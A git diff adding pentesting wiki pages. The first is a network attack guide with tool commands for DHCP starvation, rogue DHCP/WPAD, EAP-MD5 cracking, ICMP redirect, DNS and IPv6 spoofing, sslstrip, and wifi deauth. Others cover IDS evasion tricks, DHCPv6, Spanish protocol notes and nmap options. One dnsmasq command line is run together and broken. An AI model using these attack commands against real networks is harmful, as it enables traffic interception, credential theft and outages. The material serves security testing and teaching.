+This attack will work only if you can see the responses of the DHCP server and complete the protocol \(**Discover** \(Comp\) --&gt; **Offer** \(server\) --&gt; **Request** \(Comp\) --&gt; **ACK** \(server\)\). For example, this is **not possible in Wifi networks**.
+
+Another way to perform a DHCP DoS is to send a **DHCP-RELEASE packet using as source code every possible IP**. Then, the server will think that everybody has finished using the IP.
+
+```bash
+yersinia dhcp -attack 1
+yersinia dhcp -attack 3 #More parameters are needed
+```
+
+A more automatic way of doing this is using the tool [DHCPing](https://github.com/kamorin/DHCPig)
+
+You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and exhaust legitimate servers so that they become unresponsive. So when the legitimate try to reconnect, **you can server malicious values mentioned in the next attack**.
+
+#### Set malicious values
+
+You can use Responder DHCP script  \(_/usr/share/responder/DHCP.py_\) to establish a rogue DHCP server. Setting a malicious gateway is not ideal, because the hijacked connection is only half-duplex \(i.e., we capture egress packets from the client, but not the responses from the legitimate gateway\). As such, I would recommend setting a rogue DNS or WPAD server to capture HTTP traffic and credentials in particular.
+
+| Description | Example |
+| :--- | :--- |
+| Our IP address, advertised as a gateway | _-i 10.0.0.100_ |
+| The local DNS domain name \(optional\) | _-d example.org_ |
+| IP address of the original router/gateway | _-r 10.0.0.1_ |
+| Primary DNS server IP address | _-p 10.0.0.100_ |
+| Secondary DNS server IP address \(optional\) | _-s 10.0.0.1_ |
+| The netmask of the local network | _-n 255.255.255.0_ |
+| The interface to listen for DHCP traffic on | _-I eth1_ |
+| WPAD configuration address \(URL\) | _-w “http://10.0.0.100/wpad.dat\n”_ |
+| Spoof the default gateway IP address | -S |
+| Respond to all DHCP requests \(very noisy\) | -R |
+
+### **EAP**
+
+Here are some of the attack tactics that can be used against 802.1X implementations:
+
+* Active brute-force password grinding via EAP
+* Attacking the RADIUS server with malformed EAP content ****\(exploits\)
+* EAP message capture and offline password cracking \(EAP-MD5 and PEAP\)
+* Forcing EAP-MD5 authentication to bypass TLS certificate validation
+* Injecting malicious network traffic upon authenticating using a hub or similar
+
+If the attacker if between the victim and the authentication server, he could try to degrade \(if necessary\) the authentication protocol to EAP-MD5 and capture the authentication attempt. Then, he could brute-force this using: 
+
+```text
+eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt
+```
+
+### HSRP AND VRRP
+
+Hot Standby Routing Protocol \(HSRP\) and the Virtual Router Redundancy Protocol \(VRRP\) are used in high-availability environments to provide failover support. Routers send packets to local multicast groups announcing configuration and priority details.
+
+HSRP is a proprietary Cisco protocol with no RFC, whereas VRRP is standardized. To evaluate HSRP and VRRP support within an environment, use a network sniffer to capture the management traffic. You can use a number of tools to craft HSRP messages \(including Scapy and Yersinia\), but only Loki provides VRRP support at this time.
+
+For more information about how to attack this protocols go to the book _**Network Security Assessment: Know Your Network \(3rd edition\)**_
+
+### RIP
+
+Three versions of the Routing Information Protocol \(RIP\) exist—RIP, RIPv2, and RIPng. RIP and RIPv2 use UDP datagrams sent to peers via port 520, whereas RIPng broadcasts datagrams to UDP port 521 via IPv6 multicast. RIPv2 introduced MD5 authentication support. RIPng does not incorporate native authentication; rather, it relies on optional IPsec AH and ESP headers within IPv6.
+
+For more information about how to attack this protocol go to the book _**Network Security Assessment: Know Your Network \(3rd edition\).**_
+
+#### EIGRP
+
+The Enhanced Interior Gateway Routing Protocol \(EIGRP\) is Cisco proprietary and can be run with or without authentication. __[Coly](https://code.google.com/p/coly/) supports capture of EIGRP broadcasts and injection of packets to manipulate routing configuration.
+
+For more information about how to attack this protocol go to the book _**Network Security Assessment: Know Your Network \(3rd edition\).**_
+
+### OSPF
+
+Most Open Shortest Path First \(OSPF\) implementations use MD5 to provide authentication between routers. Loki and John the Ripper can capture and attack MD5 hashes to reveal the key, which can then be used to advertise new routes. The route parameters are set by using the _Injection_ tab, and the key set under _Connection_.
+
+For more information about how to attack this protocol go to the book _**Network Security Assessment: Know Your Network \(3rd edition\).**_
+
+_\*\*\*\*_
+
+You can find some more information about network attacks [here](https://github.com/Sab0tag3d/MITM-cheatsheet). _****\(TODO: Read it all and all new attacks if any\)_
+
+## **Spoofing**
+
+The attacker configures all the network parameters \(GW, IP, DNS\) of the new member of the network sending fake DHCP responses.
+
+```bash
+Ettercap
+yersinia dhcp -attack 2 #More parameters are needed
+```
+
+### ICMPRedirect
+
+ICMP Redirect consist on sending an ICMP packet type 1 code 5 that indicates that the attacker is the best way to reach an IP. Then, when the victim wants to contact the IP, it will send the packet through the attacker.
+
+```bash
+Ettercap
+icmp_redirect
+hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]
+```
+
+### DNS Spoofing
+
+The attacker will resolve some \(or all\) the domains that the victim ask for.
+
+```bash
+set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on
+```
+
+**Configure own DNS with dnsmasq**
+
+```bash
+apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
+dig @localhost domain.example.com # Test the configured DNS
+```
+
+### Local Gateways
+
+ Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use _gateway-finder.py_ to identify hosts that support IPv4 forwarding.
+
+```text
+root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
+root@kali:~# cd gateway-finder/
+root@kali:~# arp-scan -l | tee hosts.txt
+Interface: eth0, datalink type: EN10MB (Ethernet)
+Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) 
+10.0.0.100     00:13:72:09:ad:76       Dell Inc.
+10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
+10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.
+
+root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
+gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
+[+] Using interface eth0 (-I to change)
+[+] Found 3 MAC addresses in hosts.txt
+[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
+[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
+```
+
+### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
+
+Microsoft systems use Link-Local Multicast Name Resolution \(LLMNR\) and the NetBIOS Name Service \(NBT-NS\) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS \(mDNS\) to discover systems within a network. These protocols are unauthenticated and broadcast messages over UDP; thus, attackers can exploit them to direct users to malicious services.
+
+You can impersonate services that are searched by hosts using Responder to send fake responses.  
+Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
+
+### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
+
+Many browsers use Web Proxy Auto-Discovery \(WPAD\) to load proxy settings from the network. A WPAD server provides client proxy settings via a particular URL \(e.g., _http://wpad.example.org/wpad.dat_\) upon being identified through any of the following:
+
+* DHCP, using a code 252 entry[34](https://learning.oreilly.com/library/view/Network+Security+Assessment,+3rd+Edition/9781491911044/ch05.html#ch05fn41)
+* DNS, searching for the _wpad_ hostname in the local domain
+* Microsoft LLMNR and NBT-NS \(in the event of DNS lookup failure\)
+
+Responder automates the WPAD attack—running a proxy and directing clients to a malicious WPAD server via DHCP, DNS, LLMNR, and NBT-NS.  
+Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
+
+### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)
+
+You can offer different services in the network to try to **trick a user** to enter some **plain-text credentials**. **More information about this attack in** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.**
+
+### IPv6 Neighbor Spoofing
+
+This attack is very similar to ARP Spoofing but in the IPv6 world. You can get the victim think that the IPv6 of the GW has the MAC of the attacker.
+
+```bash
+sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
+sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds
+```
+
+### IPv6 Router Advertisement Spoofing/Flooding
+
+Some OS configure by default the gateway from the RA packets sent in the network. To declare the attacker as IPv6 router you can use:
+
+```bash
+sysctl -w net.ipv6.conf.all.forwarding=1 4
+ip route add default via <ROUTER_IPv6> dev wlan0
+fake_router6 wlan0 fe80::01/16
+```
+
+### IPv6 DHCP spoofing
+
+By default some OS try to configure the DNS reading a DHCPv6 packet in the network. Then, an attacker could send a DHCPv6 packet to configure himself as DNS. The DHCP also provides an IPv6 to the victim.
+
+```bash
+dhcp6.spoof on
+dhcp6.spoof.domains <list of domains>
+
+mitm6
+```
+
+### HTTP \(fake page and JS code injection\)
+
+## Internet Attacks
+
+### sslStrip
+
+Basically what this attack does is, in case the **user** try to **access** a **HTTP** page that is **redirecting** to the **HTTPS** version. **sslStrip** will **maintain** a **HTTP connection with** the **client and** a **HTTPS connection with** the **server** so it ill be able to **sniff** the connection in **plain text**.
+
+```bash
+apt-get install sslstrip
+sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
+#iptables --flush
+#iptables --flush -t nat
+iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
+iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT
+```
+
+More info [here](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf).
+
+### sslStrip+ and dns2proxy for bypassing HSTS
+
+The **difference** between **sslStrip+ and dns2proxy** against **sslStrip** is that they will **redirect** for example _**www.facebook.com**_ **to** _**wwww.facebook.com**_ \(note the **extra** "**w**"\) and will set the **address of this domain as the attacker IP**. This way, the **client** will **connect** to _**wwww.facebook.com**_ **\(the attacker\)** but behind the scenes **sslstrip+** will **maintain** the **real connection** via https with **www.facebook.com**.
+
+The **goal** of this technique is to **avoid HSTS** because _**wwww**.facebook.com_ **won't** be saved in the **cache** of the browser, so the browser will be tricked to perform **facebook authentication in HTTP**.  
+Note that in order to perform this attack the victim has to try to access initially to http://www.faceook.com and not https. This can be done modifying the links inside an http page.
+
+More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and [here](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly).
+
+**sslStrip or sslStrip+ doesn;t work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag**  [**`includeSubdomains`**](https://hstspreload.appspot.com/) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.**
+
+TODO: easy-creds, evilgrade, metasploit, factory
+
+## TCP listen in port
+
+```text
+sudo nc -l -p 80
+socat TCP4-LISTEN:80,fork,reuseaddr -
+```
+
+## TCP + SSL listen in port
+
+#### Generate keys and self-signed certificate
+
+```text
+FILENAME=server
+# Generate a public/private key pair:
+openssl genrsa -out $FILENAME.key 1024
+# Generate a self signed certificate:
+openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
+# Generate the PEM file by just appending the key and certificate files:
+cat $FILENAME.key $FILENAME.crt >$FILENAME.pem
+```
+
+#### Listen using certificate
+
+```text
+sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -
+```
+
+#### Listen using certificate and redirect to the hosts
+
+```text
+sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0
+```
+
+Some times, if the client checks that the CA is a valid one, you could **serve a certificate of other hostname signed by a CA**.  
+Another interesting test, is to serve a c**ertificate of the requested hostname but self-signed**.
+
+Other things to test is to try to sign the certificate with a valid certificate that it is not a valid CA. Or to use the valid public key, force to use an algorithm as diffie hellman \(one that do not need to decrypt anything with the real private key\) and when the client request a probe of the real private key \(like a hash\) send a fake probe and expect that the client does not check this.
+
+## Bettercap 2
+
+```bash
+## Events
+events.stream off #Stop showing events
+events.show #Show all events
+events.show 5 #Show latests 5 events 
+events.clear
+
+## Ticker (loop of commands)
+set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on
+
+## Caplets
+caplets.show
+caplets.update
+
+## Wifi
+wifi.recon on
+wifi.deauth BSSID
+wifi.show
+# Fake wifi
+set wifi.ap.ssid Banana
+set wifi.ap.bssid DE:AD:BE:EF:DE:AD
+set wifi.ap.channel 5
+set wifi.ap.encryption false #If true, WPA2
+wifi.recon on; wifi.ap
+```
+
+### Active Discovery Notes
+
+Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP \(Port Unreachable\) is sent.
+
+### **ARP discover**
+
+ARP packets are used to discover wich IPs are being used inside the network. The PC has to send a request for each possible IP address and only the ones that are being used will respond.
+
+### **mDNS \(multicast DNS\)**
+
+Bettercap send a MDNS request \(each X ms\)  asking for **\_services\_.dns-sd.\_udp.local** the machine that see this paket usually answer this request. Then, it only searchs for machine answering to "services".
+
+**Tools**
+
+* Avahi-browser \(--all\)
+* Bettercap \(net.probe.mdns\)
+* Responder
+
+### **NBNS \(NetBios Name Server\)**
+
+Bettercap broadcast packets to the port 137/UDP asking for the name "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+### **SSDP \(Simple Service Discovery Protocol\)**
+
+Bettercap broadcast SSDP packets searching for all kind of services \(UDP Port 1900\).
+
+### **WSD \(Web Service Discovery\)**
+
+Bettercap broadcast WSD packets searching for services \(UDP Port 3702\).
+
diff --git a/pentesting/pentesting-network/dhcpv6.md b/pentesting/pentesting-network/dhcpv6.md
new file mode 100644
index 00000000..b45909a4
--- /dev/null
+++ b/pentesting/pentesting-network/dhcpv6.md
@@ -0,0 +1,45 @@
+# DHCPv6
+
+
+
+|  DHCPv6 Message Type |  DHCPv4 Message Type |
+| :--- | :--- |
+|  Solicit \(1\) |  DHCPDISCOVER |
+|  Advertise \(2\) |  DHCPOFFER |
+|  Request \(3\), Renew \(5\), Rebind \(6\) |  DHCPREQUEST |
+|  Reply \(7\) |  DHCPACK / DHCPNAK |
+|  Release \(8\) |  DHCPRELEASE |
+|  Information-Request \(11\) |  DHCPINFORM |
+|  Decline \(9\) |  DHCPDECLINE |
+|  Confirm \(4\) |  none |
+|  Reconfigure \(10\) |  DHCPFORCERENEW |
+|  Relay-Forw \(12\), Relay-Reply \(13\) |  none |
+
+ SOLICIT \(1\)
+
+ A DHCPv6 client sends a Solicit message to locate DHCPv6 servers. ADVERTISE \(2\)
+
+ A server sends an Advertise message to indicate that it is available for DHCP service, in response to a Solicit message received from a client. REQUEST \(3\)
+
+ A client sends a Request message to request configuration parameters, including IP addresses or delegated prefixes, from a specific server. CONFIRM \(4\)
+
+ A client sends a Confirm message to any available server to determine whether the addresses it was assigned are still appropriate to the link to which the client is connected. This could happen when the client detects either a link-layer connectivity change or if it is powered on and one or more leases are still valid. The confirm message is used to confirm whether the client is still on the same link or whether it has been moved. The actual lease\(s\) are not validated; just the prefix portion of the addresses or delegated prefixes. RENEW \(5\)
+
+ A client sends a Renew message to the server that originally provided the client's addresses and configuration parameters to extend the lifetimes on the addresses assigned to the client and to update other configuration parameters. REBIND \(6\)
+
+ A client sends a Rebind message to any available server to extend the lifetimes on the addresses assigned to the client and to update other configuration parameters; this message is sent after a client receives no response to a Renew message. REPLY \(7\)
+
+ A server sends a Reply message containing assigned addresses and configuration parameters in response to a Solicit, Request, Renew, Rebind message received from a client. A server sends a Reply message containing configuration parameters in response to an Information-request message. A server sends a Reply message in response to a Confirm message confirming or denying that the addresses assigned to the client are appropriate to the link to which the client is connected. A server sends a Reply message to acknowledge receipt of a Release or Decline message. RELEASE \(8\)
+
+ A client sends a Release message to the server that assigned addresses to the client to indicate that the client will no longer use one or more of the assigned addresses. DECLINE \(9\)
+
+ A client sends a Decline message to a server to indicate that the client has determined that one or more addresses assigned by the server are already in use on the link to which the client is connected. RECONFIGURE \(10\)
+
+ A server sends a Reconfigure message to a client to inform the client that the server has new or updated configuration parameters, and that the client is to initiate a Renew/Reply or Information-request/Reply transaction with the server in order to receive the updated information. INFORMATION-REQUEST \(11\)
+
+ A client sends an Information-request message to a server to request configuration parameters without the assignment of any IP addresses to the client. RELAY-FORW \(12\)
+
+ A relay agent sends a Relay-forward message to relay messages to servers, either directly or through another relay agent. The received message, either a client message or a Relay-forward message from another relay agent, is encapsulated in an option in the Relay-forward message. RELAY-REPL \(13\)
+
+ A server sends a Relay-reply message to a relay agent containing a message that the relay agent delivers to a client. The Relay-reply message may be relayed by other relay agents for delivery to the destination relay agent. The server encapsulates the client message as an option in the Relay-reply message, which the relay agent extracts and relays to the client.
+
diff --git a/pentesting/pentesting-network/ids-evasion.md b/pentesting/pentesting-network/ids-evasion.md
new file mode 100644
index 00000000..c3748739
--- /dev/null
+++ b/pentesting/pentesting-network/ids-evasion.md
@@ -0,0 +1,44 @@
+# IDS and IPS Evasion
+
+## **TTL Manipulation**
+
+Send some packets with a TTL enough to arrive to the IDS/IPS but not enough to arrive to the final system. And then, send another packets with the same sequences as the other ones so the IPS/IDS will think that they are repetitions and won't check them, but indeed they are carrying the malicious content.
+
+**Nmap option:** `--ttlvalue <value>`
+
+## Avoiding signatures
+
+Just add garbage data to the packets so the IPS/IDS signature is avoided.
+
+**Nmap option:** `--data-length 25`
+
+## **Fragmented Packets**
+
+Just fragment the packets and send them. If the IDS/IPS doesn't have the ability to reassemble them, they will arrive to the final host.
+
+**Nmap option:** `-f`
+
+## **Invalid** _**checksum**_
+
+Sensors usually don't calculate checksum for performance reasons. _****_So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example:
+
+Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid.
+
+## **Uncommon IP and TCP options**
+
+A sensor might disregard packets with certain flags and options set within IP and TCP headers, whereas the destination host accepts the packet upon receipt.
+
+## **Overlapping**
+
+It is possible that when you fragment a packet, some kind of overlapping exists between packets \(maybe first 8 bytes of packet 2 overlaps with last 8 bytes of packet 1, and 8 last bytes of packet 2 overlaps with first 8 bytes of packet 3\). Then, if the IDS/IPS reassembles them in a different way than the final host, a different packet will be interpreted.  
+Or maybe, 2 packets with the same offset comes and the host has to decide which one it takes.
+
+* **BSD**: It has preference for packets with smaller _offset_. For packets with same offset, it will choose the first one.
+* **Linux**: Like BSD, but it prefers the last packet with the same offset.
+* **First** \(Windows\): First value that comes, value that stays.
+* **Last** \(cisco\): Last value that comes, value that stays.
+
+## Tools
+
+* [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke)
+
diff --git a/pentesting/pentesting-network/network-protocols-explained-esp.md b/pentesting/pentesting-network/network-protocols-explained-esp.md
new file mode 100644
index 00000000..20c4f9b8
--- /dev/null
+++ b/pentesting/pentesting-network/network-protocols-explained-esp.md
@@ -0,0 +1,109 @@
+# Network Protocols Explained \(ESP\)
+
+## Multicast DNS \(mDNS\)
+
+ The **multicast DNS** \(**mDNS**\) protocol resolves host names to IP addresses within small networks that do not include a local name server.
+
+When an mDNS client needs to resolve a host name, it sends an Ip Multicast query message that asks the host having that name to identify itself. That target machine then multicasts a message that includes its IP address. All machines in that subnet can then use that information to update their mDNS caches.
+
+Any host can relinquish its claim to a domain name by sending a response packet with a Time To Live\(TTL\) equal to zero.
+
+By default, mDNS only and exclusively resolves host names ending with the **.local** top-level domain \(TLD\). This can cause problems if that domain includes hosts which do not implement mDNS but which can be found via a conventional unicast DNS server. Resolving such conflicts requires network-configuration changes.
+
+* When using Ethernet frames, the standard multicast MAC address _01:00:5E:00:00:FB_ \(for IPv4\) or _33:33:00:00:00:FB_ \(for IPv6\).
+* IPv4 address _224.0.0.251_ or IPv6 address _ff02::fb_.
+* UDP port 5353.
+
+mDNS queries will not pass through routers \(broadcast in ethernet only\).
+
+## DNS-SD \(Service Discovery\)
+
+This protocol can be used to discover hosts in the network. To do that you can requests special domain names \(e.g. _\_printers\_tcp.local_\) and all the domains rlated with that name will answer \(in this cases, printers\). A complete list with this special names can be found [here](http://www.dns-sd.org/ServiceTypes.html).
+
+## SSDP
+
+The Simple Service Discovery Protocol is used to discover services in a network mainly for using the protocol UPnP.
+
+SSDP is a text-based protocol based on [HTTPU](https://en.wikipedia.org/wiki/HTTPU). It uses UDP as the underlying transport protocol. Services are announced by the hosting system with multicast addressing to a specifically designated IP multicast address at UDP port number 1900. In IPv4, the multicast address is 239.255.255.250
+
+## WSD
+
+**Web Service for Devices**.  
+This service allow the a device connected in a network to discover which services \(like printers\) are available in the network.
+
+The client can send a broadcast UDP packet asking for some kind of service or the service provider can send a broadcast packet saying that it is offering a service.
+
+## OAuth2.0
+
+ Procolo que permite compartir tu información por ejemplo de google con otros servicios.
+
+Básicamente **permite compartir la información justa** y necesaria que se tiene guardado en un servicio, con otro. De esta forma se puede logear más rápido y tus **datos están tan solo guardados en un sitio** y no hay que poner usernames/contraseñas en todos lados.
+
+Esto funciona así:
+
+Primero tienes que estar ya logeado en google o se te abrirá una ventana para que te logees. Acto seguido, el servicio pedirá al servidor de google un token para acceder a tu info. Google soltará una de esas pantalla de “_La aplicación XXXXX quiere acceder a esta información tuya: ..._” al darle a aceptar, google responderá a la aplicación con un código el cuál pa aplicación usará para pedirle un token con el que google responderá. Una vez la aplicación tenga un token la puede usar con el API de google para obtener la información que había pedido.
+
+## RADIUS
+
+ Protocolo de autenticación y autorización para acceder a una red. \(Usa puerto 1813 UDP\)
+
+Se usa principalmente por proveedores de servicios de internet para gestionar el acceso a la red de sus clientes.
+
+Permite Autenticación, Autorización y Anotación.
+
+Cómo funciona:
+
+El usuario primero habla con el NAS \(puerta den entrada al servidor\), este comprueba que el nombre y contraseña que se le envía sean válidos preguntándoselo al servidor RADIUS.
+
+Opcionalmente por mayor seguridad se puede comprobar la dirección de red o nº de teléfono del servidor para ver si coincide.
+
+Tanto el servidor RADIUS como el usuario que intenta conectarse tienen un “secreto compartido“, de esta forma el servidor RADIUS envía un desafío al NAS que reenvía al usuario que se está logeando, este lo encripta con dicho secreto y se lo reenvía y si coincide con el cifrado que ha hecho el RADIUS, el usuario ha demostrado su identidad.
+
+Una vez se demuestra la identidad, el usuario RADIUS instruye al NAS para que este le asigne al usuario una dirección IP. Así mismo, cuando esto es realizado, el NAS envía una mensaje de inicio al RADIUS para que este lo anote. Cuando el usuario cierra la sesión el NAS envía un mensaje de finalización. De esta forma el RADIUS anota el consumo de la sesión para poder facturar en consecuencia \(también se usan estos datos con motivos estadísticos\)
+
+## SMB and NetBIOS
+
+###  **SMB**
+
+Es un protocolo para compartir archivos/impresoras/puertos...
+
+Este puede correr directamente sobre TCP en el puerto 445 \(que si haces un escaneo de windows ves que lo llama microsoft-ds\)
+
+O sobre UDP 137, 138 o TCP 137, 138 que usa NetBIOS sobre TCP \( llamado netbios -ssn\)
+
+El objetivo de que SMB esté implementado sobre solo TCP o sobre NetBIOS + TCP es aumentar la capacidad de comunicación con más equipos que solo soportan uno u otro
+
+### **NetBIOS**
+
+Su función es la de establecer sesiones y mantener las conexiones para poder compartir recursos en red, pero para enviar paquetes de un sitio a otro requiere de IPC/IPX o NetBEUI o TCP/IP.
+
+Cada máquina usando NetBIOS debe tener un **nombre** único que la distinga del resto. Así que cuando entra una nueva máquina, primero se revisa que nadie use el nombre que solicita usar. también existen los **nombres de grupo** que pueden usar todas las estaciones que quieran pero no pueden haber dos grupos con el mismo nombre. Es una forma de poder enviar mensajes a varias máquinas. Por lo que se pueden enviar mensajes a un usuario, a un grupo o broadcast.
+
+La conexión puede ser connectionless o connection-oriented:
+
+ **connectionless:** Se envía un datagrama al destino pero no hay ninguna forma de saludo ni de mensaje de recibido. La máquina destino debe estar configurada para poder recibir datagramas.
+
+ **connection-orineted:** Se crea una sesión entre dos nombres \(puede ser incluso entre dos nombres de la misma máquina\) sí se envía mensaje de recibido o error.
+
+**NetBEUI** consiste realmente en NetBIOS sobre NetBEUI el cual es un protocolo de red y transporte que lleva a NetBIOS, este era rápido pero muy ruidoso pues emitía muchos broadcast, también se puede tener SMB sobre NetBEUI pero ya es más normal que NetBIOS corra sobre TCP.
+
+## LDAP
+
+ Protocolo que permite administrar directorios y acceder a bases de información de usuarios mediante TCP/IP.
+
+Permite tanto sacar información como introduirla mediante distintos comandos.
+
+Por lo tanto es un protocolo que sirve para acceder a diversas bases de datos que están preparadas para hablar este protocolo
+
+## Active Directory
+
+Básicamente es una base de datos de objetos con información como usuarios, grupos, privilegios y recursos que es accesible desde la red \(a traves de un dominio\) para que se pueda acceder a dicha información y se pueda manejar de forma centralizada.
+
+Servidor que guarda objetos. Estos objetos son visibles en la red mediante un dominio. Un dominio puede tener dentro de él su servidor donde está implementado, grupos, usuarios...
+
+También puede tener subdominios que tengan su propio servidor asociado con sus grupos, usuarios...
+
+De esta forma se centraliza la gestión de usuarios de una red pues se pueden generar en este servidor los usuarios que se pueden logear, con los permisos que tienen para saber si pueden acceder a determinados recursos de la red y así se puede controlar todo esto de una forma sencilla.
+
+De esta forma se puede consultar el directorio con un nombre de usuario y obtener info como correo o nº de telefono. También se puedenhacer consultas generalizadas como:¿donde estan las impresoras? ¿Cuáles son los nombres de los dominios?
+
diff --git a/pentesting/pentesting-network/nmap-summary-esp.md b/pentesting/pentesting-network/nmap-summary-esp.md
new file mode 100644
index 00000000..f01359e1
--- /dev/null
+++ b/pentesting/pentesting-network/nmap-summary-esp.md
@@ -0,0 +1,267 @@
+# Nmap Summary \(ESP\)
+
+```text
+nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
+```
+
+ **-iL** lista\_IPs
+
+**-iR** numero --&gt; Número de Ips aleatorias, se pueden excluir posibles Ips con **--exclude &lt;Ips&gt;** o **--excludefile &lt;fichero&gt;**
+
+**Descubrimiento de equipos:**
+
+Podemos usar máscaras/24
+
+**-sL**: No es invasivo, lista los objetivos realizando peticiones de DNS para resolver nombres. Sirve para saber si por ejemplo www.prueba.es/24 todas las Ips son objetivos nuestros.
+
+Por defecto Nmap lanza una fase de descubrimiento que consta de: -PA80 -PS443 -PE -PP
+
+**-Pn** No ping --&gt; útil **si se sabe que todos están activos** \(sino lo estuviera alguno se podría perder mucho tiempo, pero también saca falsos negativos esta opción diciendo que no esta activo\), impide la fase de descubirmiento
+
+**-sn** No port scan: Tras completar fase de reconocimiento **no analiza puertos.** Es relativamente sigilosa, y permite un pequeño reconocimiento de la red. Con privilegios envía un ACK \(-PA\) al 80, un SYN\(-PS\) al 443 y un echo request y un Timestamp request, sin privilegios siempre completa conexiones. Si el objetivo es de la red, solo usa ARP\(-PR\). Si se usa con otra opción solo se lanzan los paquetes de la otra opción.
+
+**-PR** Ping ARP: Se usa por defecto cuando se analizan equipos de nuestra red, es más rápido que usar pings. Si no se quiere usar paquetes ARP hay que usar --send-ip.
+
+**-PS&lt;puertos&gt;** SYN: envía paquetes de SYN a los que si responde SYN/ACK es que esta abierto\(al que se reponde con RST para no acabar la conexión\), si responde RST esta cerrado y si no responde es inalcanzable. En caso de no tener privilegios automáticamente se usa una conexión total. Si no se dan puertos, lo lanza al 80.
+
+**-PA&lt;puertos&gt;** ACK: Como la anterior pero con ACK, combinando ambas se obtienen mejores resultados.
+
+**-PU&lt;puertos&gt;** UDP: El objetivo es el contrario, se envían a puertos que se espera que estén cerrados. Algunos firewall solo revisan conexiones TCP. Si está cerrado se responde con port unreachable, si se responde con otro icmp o no se responde se deja como destino inalcanzable.
+
+**-PE, -PP, -PM** PINGS ICMP:echo replay, timestamp y addresmask. Se lanzan para descubrir si el objetivo esta activo
+
+**-PY&lt;puertos&gt;** SCTP: Envía sondas SCTP INIT al 80 por defecto, se puede responder INIT-ACK\(abierto\) o ABORT\(cerrado\) o nada o ICMP inalcanzable\(inactivo\)
+
+-**PO&lt;protocolos&gt;:** Se indica un protocolo en las cabeceras, por defecto 1\(ICMP\), 2\(IGMP\) y 4\(Encap IP\). Para los protocolos ICMP, IGMP, TCP \(6\) Y UDP \(17\) se envían las cabeceras del protocolo, para el resto solo se envía la cabecera IP. EL objetivo de esto es que por la malformación de las cabeceras, se responda Protocolo inalcanzable o respuestas del mismo protocolo para saber si está levantado.
+
+**-n** No DNS
+
+**-R** DNS siempre
+
+**Técnicas de escaneo de puertos:**
+
+**-sS** --&gt; No completa la conexión por lo que no deja rastro, muy buena si se puede usar. \(privilegios\) Es la que se usa por defecto
+
+**-sT** --&gt; Completa la conexión, por lo que sí que deja rastro, pero seguro que se puede usar. Por defecto sin privilegios.
+
+**-sU** --&gt; Más lenta, para UDP. Ppalmente: DNS\(53\), SNMP\(161,162\), DHCP\(67 y 68\), \(-sU53,161,162,67,68\): abierto\(respuesta\), cerrado\(puerto inalcanzable\), filtrado \(otro ICMP\), abierto/filtrado \(nada\). En caso de tener abierto/filtrado, -sV envía numerosas peticiones para detectar alguna de las versiones que nmap soporta pudiendo detectar el auténtico estado. Aumenta mucho el tiempo.
+
